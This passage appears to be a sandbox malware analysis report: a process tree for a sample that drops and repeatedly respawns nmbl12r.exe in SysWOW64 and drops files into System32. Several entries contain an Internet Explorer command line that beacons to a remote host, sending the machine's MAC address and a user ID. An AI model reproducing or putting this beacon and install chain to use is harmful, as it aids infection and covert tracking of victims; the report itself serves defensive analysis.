PID 2052 wrote to memory of 4480   2052  nmbl12r.exe                                          98
PID 2052 wrote to memory of 4480   2052  nmbl12r.exe                                          98
PID 4480 wrote to memory of 2360   4480  nmbl12r.exe                                          99
PID 4480 wrote to memory of 2360   4480  nmbl12r.exe                                          99
PID 4480 wrote to memory of 2360   4480  nmbl12r.exe                                          99
PID 2360 wrote to memory of 4960   2360  nmbl12r.exe                                          101
PID 2360 wrote to memory of 4960   2360  nmbl12r.exe                                          101
PID 2360 wrote to memory of 4960   2360  nmbl12r.exe                                          101
PID 4960 wrote to memory of 1700   4960  nmbl12r.exe                                          102
PID 4960 wrote to memory of 1700   4960  nmbl12r.exe                                          102
PID 4960 wrote to memory of 1700   4960  nmbl12r.exe                                          102
PID 1700 wrote to memory of 1544   1700  nmbl12r.exe                                          103
PID 1700 wrote to memory of 1544   1700  nmbl12r.exe                                          103
PID 1700 wrote to memory of 1544   1700  nmbl12r.exe                                          103
PID 1544 wrote to memory of 3596   1544  nmbl12r.exe                                          104
PID 1544 wrote to memory of 3596   1544  nmbl12r.exe                                          104
PID 1544 wrote to memory of 3596   1544  nmbl12r.exe                                          104
PID 3596 wrote to memory of 1804   3596  nmbl12r.exe                                          105
PID 3596 wrote to memory of 1804   3596  nmbl12r.exe                                          105
PID 3596 wrote to memory of 1804   3596  nmbl12r.exe                                          105
PID 1804 wrote to memory of 4980   1804  nmbl12r.exe                                          106
PID 1804 wrote to memory of 4980   1804  nmbl12r.exe                                          106
PID 1804 wrote to memory of 4980   1804  nmbl12r.exe                                          106
PID 4980 wrote to memory of 1672   4980  nmbl12r.exe                                          107
PID 4980 wrote to memory of 1672   4980  nmbl12r.exe                                          107
PID 4980 wrote to memory of 1672   4980  nmbl12r.exe                                          107
PID 1672 wrote to memory of 1368   1672  nmbl12r.exe                                          108
PID 1672 wrote to memory of 1368   1672  nmbl12r.exe                                          108
PID 1672 wrote to memory of 1368   1672  nmbl12r.exe                                          108
PID 1368 wrote to memory of 3524   1368  nmbl12r.exe                                          109
PID 1368 wrote to memory of 3524   1368  nmbl12r.exe                                          109
Processes
Process tree (depth = nesting level under the submitted sample; each entry gives its PID, image path, command line and the signatures it triggered):

[depth 1] PID 3068: C:\Users\Admin\AppData\Local\Temp\fb7e4180110ac2917b6a1f816438c7b9_JaffaCakes118.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\fb7e4180110ac2917b6a1f816438c7b9_JaffaCakes118.exe"
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

[depth 2] PID 4288: C:\Program Files (x86)\Internet Explorer\iexplore.exe
    Command line: "C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://dd.zxcvbnmzxcvbnm.com:9999/Chinagogogo.ashx?Mac=62:A6:B3:07:38:8A&UserId=117&Bate=1.06&ThreadNum=3&Url=;
    - Suspicious use of WriteProcessMemory

[depth 3] PID 1796: C:\Program Files\Internet Explorer\IEXPLORE.EXE
    Command line: "C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://dd.zxcvbnmzxcvbnm.com:9999/Chinagogogo.ashx?Mac=62:A6:B3:07:38:8A&UserId=117&Bate=1.06&ThreadNum=3&Url=;
    - Modifies Internet Explorer settings
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory

[depth 4] PID 216: C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
    Command line: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1796 CREDAT:17410 /prefetch:2
    - Modifies Internet Explorer settings
    - Suspicious use of SetWindowsHookEx
[depth 2] PID 1676: \??\c:\BNO5lPp.exe
    Command line: c:\BNO5lPp.exe
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

[depth 3] PID 4540: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

[depth 4] PID 924: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

[depth 5] PID 4756: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

[depth 6] PID 4952: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

[depth 7] PID 2260: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

[depth 8] PID 5084: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

[depth 9] PID 2052: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

[depth 10] PID 4480: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

[depth 11] PID 2360: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

[depth 12] PID 4960: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

[depth 13] PID 1700: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

[depth 14] PID 1544: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe
    - Executes dropped EXE
    - Enumerates connected drives
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

[depth 15] PID 3596: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

[depth 16] PID 1804: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

[depth 17] PID 4980: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

[depth 18] PID 1672: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

[depth 19] PID 1368: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

[depth 20] PID 3524: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
[depth 21] PID 4828: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken

[depth 22] PID 2232: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken

[depth 23] PID 3308: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken

[depth 24] PID 3164: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken

[depth 25] PID 4740: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken

[depth 26] PID 3056: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe
    - Executes dropped EXE
    - Enumerates connected drives
    - Suspicious use of AdjustPrivilegeToken

[depth 27] PID 3592: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken

[depth 28] PID 4164: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken

[depth 29] PID 1180: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken

[depth 30] PID 5080: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken

[depth 31] PID 4300: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken

[depth 32] PID 4940: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken

[depth 33] PID 3700: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe
    - Executes dropped EXE
    - Enumerates connected drives
    - Suspicious use of AdjustPrivilegeToken

[depth 34] PID 1960: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken

[depth 35] PID 864: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken

[depth 36] PID 4656: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken

[depth 37] PID 856: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe
    - Executes dropped EXE
    - Enumerates connected drives
    - Suspicious use of AdjustPrivilegeToken

[depth 38] PID 3184: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken

[depth 39] PID 2716: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken

[depth 40] PID 1800: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe
    - Executes dropped EXE
    - Enumerates connected drives
    - Suspicious use of AdjustPrivilegeToken

[depth 41] PID 4816: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken

[depth 42] PID 3340: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken

[depth 43] PID 1292: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken

[depth 44] PID 3856: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken

[depth 45] PID 3608: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious use of AdjustPrivilegeToken

[depth 46] PID 2464: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken

[depth 47] PID 1160: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe
    - Executes dropped EXE
    - Enumerates connected drives
    - Suspicious use of AdjustPrivilegeToken

[depth 48] PID 3744: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken

[depth 49] PID 5004: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious use of AdjustPrivilegeToken

[depth 50] PID 3740: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken

[depth 51] PID 4036: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken

[depth 52] PID 3764: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken

[depth 53] PID 4700: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe
    - Executes dropped EXE
    - Enumerates connected drives
    - Suspicious use of AdjustPrivilegeToken

[depth 54] PID 4208: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken

[depth 55] PID 1864: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken

[depth 56] PID 2132: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken

[depth 57] PID 4356: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken

[depth 58] PID 4812: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious use of AdjustPrivilegeToken

[depth 59] PID 3216: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken

[depth 60] PID 4608: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious use of AdjustPrivilegeToken

[depth 61] PID 4376: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken

[depth 62] PID 4392: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken

[depth 63] PID 4092: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken

[depth 64] PID 1136: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken

[depth 65] PID 4944: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
[depth 66] PID 852: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe

[depth 67] PID 2152: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe

[depth 68] PID 1532: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe

[depth 69] PID 3484: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe

[depth 70] PID 1348: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe

[depth 71] PID 2352: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe

[depth 72] PID 4452: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe

[depth 73] PID 2952: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe

[depth 74] PID 2220: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe

[depth 75] PID 4236: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe

[depth 76] PID 4104: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe
    - Enumerates connected drives

[depth 77] PID 3260: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe

[depth 78] PID 632: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe

[depth 79] PID 2484: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe

[depth 80] PID 2144: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe

[depth 81] PID 3440: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe

[depth 82] PID 4664: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe

[depth 83] PID 5052: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe

[depth 84] PID 816: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe
    - System Location Discovery: System Language Discovery

[depth 85] PID 4820: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe
    - Drops file in System32 directory

[depth 86] PID 4692: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe

[depth 87] PID 3772: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe
    - Drops file in System32 directory

[depth 88] PID 4420: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe
    - Enumerates connected drives
    - System Location Discovery: System Language Discovery

[depth 89] PID 4344: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe

[depth 90] PID 3336: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe

[depth 91] PID 3904: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe

[depth 92] PID 1196: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe

[depth 93] PID 3728: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe
    - Enumerates connected drives

[depth 94] PID 3936: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe

[depth 95] PID 4472: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe

[depth 96] PID 3256: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe

[depth 97] PID 3040: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe

[depth 98] PID 5148: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe
    - System Location Discovery: System Language Discovery

[depth 99] PID 5180: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe

[depth 100] PID 5204: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe
    - Enumerates connected drives

[depth 101] PID 5220: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe

[depth 102] PID 5244: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe

[depth 103] PID 5264: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe

[depth 104] PID 5284: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe

[depth 105] PID 5304: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe

[depth 106] PID 5328: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe

[depth 107] PID 5348: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe

[depth 108] PID 5364: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe

[depth 109] PID 5388: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe
    - Drops file in System32 directory

[depth 110] PID 5408: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe

[depth 111] PID 5432: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe

[depth 112] PID 5452: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe

[depth 113] PID 5472: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe

[depth 114] PID 5492: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe

[depth 115] PID 5512: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe

[depth 116] PID 5528: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe

[depth 117] PID 5552: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe

[depth 118] PID 5572: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe
    - Drops file in System32 directory

[depth 119] PID 5592: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe

[depth 120] PID 5612: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe
    - System Location Discovery: System Language Discovery

[depth 121] PID 5632: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe

[depth 122] PID 5652: C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe
    Command line: C:\Windows\system32\g1xxCUY\nmbl12r.exe